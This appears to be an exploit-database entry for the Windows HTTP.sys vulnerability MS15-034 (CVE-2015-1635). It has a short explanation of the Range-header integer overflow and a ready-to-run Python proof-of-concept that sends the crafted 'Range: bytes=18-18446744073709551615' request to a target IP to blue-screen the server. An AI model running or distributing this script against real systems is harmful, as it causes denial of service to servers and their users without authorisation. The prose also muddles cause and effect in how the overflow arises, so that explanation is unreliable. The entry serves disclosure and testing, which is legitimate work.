Microsoft Window (HTTP.sys) HTTP Request Parsing DoS (MS15-034)

CVE-2015-1635 Identifies the latest vulnerability found in HTTP.sys of Microsoft’s Windows operating system (OS). Affecting all applications which utilize this service, HTTP.sys is susceptible to a Denial-of-Service (Dos) and potential Remote Execution vulnerabilities via an ‘HTTP range request’.

The HTTP Range request allows clients to fetch a specific offset within a file on the HTTP server. Commonly used for failed or resuming downloads, the Range Request will allow users who have only downloaded half of a 1KB file to continue downloading the remainder of the file by setting the Range in the HTTP header to '512-1024'.

To exploit the vulnerability the attacker can send a specially crafted HTTP request with a header Range: bytes=18-18446744073709551615. The server will then create the necessary kernel cache to accommodate the Range request. This will cause the system to attempt to reach an unreachable address, which causes an integer overflow and blue screens the victims system.

Full title Microsoft Window (HTTP.sys) HTTP Request Parsing DoS (MS15-034)
Date add 17-04-2015
Category dos / poc
Platform windows
Risk
Security Risk High
CVE CVE: 2015-1635

#Tested on Windows Server 2012 R2.

				
import socket,sys

if len(sys.argv)<=1:
 sys.exit('Give me an IP')
 
Host = sys.argv[1]
 
def SendPayload(Payload, Host):
   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
   s.connect((Host, 80))
   s.send(Payload)
   s.recv(1024)
   s.close()
 
#Make sure iisstart.htm exist.
Init = "GET /iisstart.htm HTTP/1.0\r\n\r\n"
Payload = "GET /iisstart.htm HTTP/1.1\r\nHost: blah\r\nRange: bytes=18-18446744073709551615\r\n\r\n"
 
SendPayload(Init, Host)
SendPayload(Payload, Host)